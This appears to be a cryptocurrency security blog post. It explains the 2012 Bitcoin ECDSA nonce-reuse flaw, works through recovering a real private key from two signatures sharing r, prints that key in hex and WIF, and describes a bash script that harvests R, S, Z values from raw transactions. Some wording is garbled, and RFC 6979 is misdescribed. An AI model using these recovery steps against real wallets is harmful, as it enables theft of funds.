Sirwin
Sirwin

The very first serious vulnerability in Blockchain and how to get the public key Bitcoin ECDSA RSZ value from the RawTX file

By CryptoDeep | CRYPTODEEP | 3 Sep 2022


CRYPTO DEEP TECH  

In this article, we will talk about extracting signature values  ECDSA R, S, Z ​​from the Bitcoin blockchain, but first, let’s remember the very first serious vulnerability in the blockchain transaction that was discovered by  Niels Schneider  ( Nils Schneider aka  tcatm  )

Bitcoin developer and owner  of «BitcoinWatch»  &  «BitcoinCharts».

4.1 History of dangerous random attacks on Bitcoin 4.1 History of dangerous random attacks on Bitcoin

Document  [PDF]Private Key Recovery Combination Attacks: On Extreme Fragility of Popular Bitcoin Key Management, Wallet and Cold Storage Solutions in Presence of Poor RNG Events 

On December 25, 2012,  Nils discovered a potential weakness in some Bitcoin blockchain transactions.

Look at this transaction:

transaction: 9ec4bc49e828d924af1d1029cacf709431abbde46d59554b62bc270e3b29c4b1


The very first serious vulnerability in Blockchain and how to get the public key Bitcoin ECDSA RSZ value from the RawTX file

input script 1:
30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1022044e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e0104dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff

input script 2:
30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad102209a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab0104dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff

This transaction has two inputs and one output.
If you look closely at the two input scripts, you will notice that there are quite a few identical bytes at the beginning and at the end.
Those bytes at the end are the hex encoded public key of the address the coins are being spent on, so there’s nothing wrong with that.
However, the first half of the script is the actual signature  (r, s):

r1: d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1
r2: d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1

s1: 44e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e
s2: 9a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab

As you can see,  it’s r1 the same  r2This is  a huge problem .

We can restore the  private key  to this public key:

04dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff

To do this, we can use a simple formula from school algebra 😉

private key = (z1*s2 - z2*s1)/(r*(s1-s2))

We just need to find  z1 and z2

These are  хэши the outputs that need to be signed. Let’s get the output transactions and count them (computed by  OP_CHECKSIG):

z1: c0e2d0a89a348de88fda08211c70d1d7e52ccef2eb9459911bf977d587784c6e
z2: 17b0f41c8c337ac1e18c98759e83a8cccbc368dd9d89e5f03cb633c265fd0ddc

Next, we pack all these values ​​​​in one  Python — script:  vulnerabilityR.py

Python script: vulnerabilityR.py Python script: vulnerabilityR.py

p is just an order  of magnitude G, a parameter of the curve  secp256k1used by Bitcoin.

Let’s create a field for our calculations:

K = GF(p)
K((z1*s2 - z2*s1)/(r*(s1-s2)))

Let’s run the script: python3 vulnerabilityR.py

Next, our script:  vulnerabilityR.py will  calculate  the private key  in this field:

ADDR: 1BFhrfTTZP3Nw4BNy4eX4KFLsn9ZeijcMm
WIF:  5KJp7KEffR7HHFWSFYjiCUAntRSTY69LAQEX1AUzaSBHHFdKEpQ
hex:  c477f9f65c22cce20657faa5b2d1d8122336f851a508a1ed04e479c34985bf96

Checking the private key on the bitaddress website Checking the private key on the bitaddress website

Private key found!

https://www.blockchain.com/btc/address/1BFhrfTTZP3Nw4BNy4eX4KFLsn9ZeijcMm

0.1638109 BTC 0.1638109 BTC

Of course, the developers of Bitcoin fixed this vulnerability by introducing deterministic functions.

This feature  RFC 6979 introduces an element of randomness into the Bitcoin signature, which enhances the cryptographic strength of the transaction. ECDSA

Document  [PDF]RFC 6979: Deterministic Usage of the Digital Signature Algorithm (DSA) and Elliptic Curve Digital Signature Algorithm (ECDSA) 


As we know in practice, there are completely different vulnerable transactions in the Bitcoin blockchain.

We previously posted  статью:  “One weak transaction in ECDSA on the Bitcoin blockchain and with the help of Lattice Attack we received a Private Key to BTC coins”

https://habr.com/ru/post/671932/

Now let’s get the public key  Bitcoin ECDSA and value  ourselves R, S, Zfrom the  «RawTX.json» file  (which we got in  01BlockchainGoogleDrive  )

Teams Teams Files Files Our Bash script code: getsign.sh Our Bash script code: getsign.sh

And so let’s take a look at the whole work  of the Bash script in detail :  getsign.sh

cat RawTX.json > index.json

Making a copy of a file  RawTX.json into a new file index.json

for run in {1..4}; do

We open  it because  we take  4 linesЦИКЛ  in the file index.json {1..4}

export LINE=1 ; sed -n "${LINE}p" index.json > index2.json

The utility  export takes  line #1  and saves it in a new file index2.json

sed -i '1d' index.json

The utility  sed removes  line #1  from the file index.json

The echo utility creates a Python script for us fileopen.py The echo utility creates a Python script for us fileopen.py

python3 fileopen.py

We run  the Python script fileopen.py  and successfully creates a new  Bash script : signscript.sh

chmod +x signscript.sh
./signscript.sh

We get the rights to the  Bash script : signscript.sh

As a result,  the breakECDSA.py Python script  is launched,  which eventually extracts the  value   and public key of Bitcoin fromRawTXR, S, Z

All this is saved to a file: "signatures.json"

file: "signatures.json" Bitcoin public key and R, S, Z value file: «signatures.json» Bitcoin public key and R, S, Z value

rm signscript.sh
rm fileopen.py

The utility  rm removes  the Python script fileopen.py  and successfully creates a new  Bash script : signscript.sh

done

As a result, everything will end after  4 cycles

rm index.json

The cycle closes and the utility  rm deletes index.json

Bash script :  getsign.sh Завершает работу!

Now we have learned:

  • Get public key  Bitcoin from ECDSA
  • Get value  R, S, Z from ECDSA
  • Apply it for криптоанализа

Source code:  https://github.com/demining/CryptoDeepTools/blob/main/02BreakECDSAcryptography

Telegram:  https://t.me/cryptodeeptech

Video:  https://youtu.be/BYd-cuFRZmM

Source: https://cryptodeeptech.ru/break-ecdsa-cryptography

   

How do you rate this article?

1


CryptoDeep
CryptoDeep

Financial security of data and secp256k1 elliptic curve cryptography against weak ECDSA signatures in BITCOIN cryptocurrency


CRYPTODEEP
CRYPTODEEP

Financial security of data and secp256k1 elliptic curve cryptography against weak ECDSA signatures in BITCOIN cryptocurrency [email protected] - Email for all questions. The creators of the software are not responsible for the use of materials Donation Address: ♥ BTC: 1Lw2gTnMpxRUNBU85Hg4ruTwnpUPKdf3nV ♥ETH: 0xaBd66CF90898517573f19184b3297d651f7b90bf ♥ YooMoney.ru/to/410011415370470

Send a $0.01 microtip in crypto to the author, and earn yourself as you read!

20% to author / 80% to me.
We pay the tips from our rewards pool.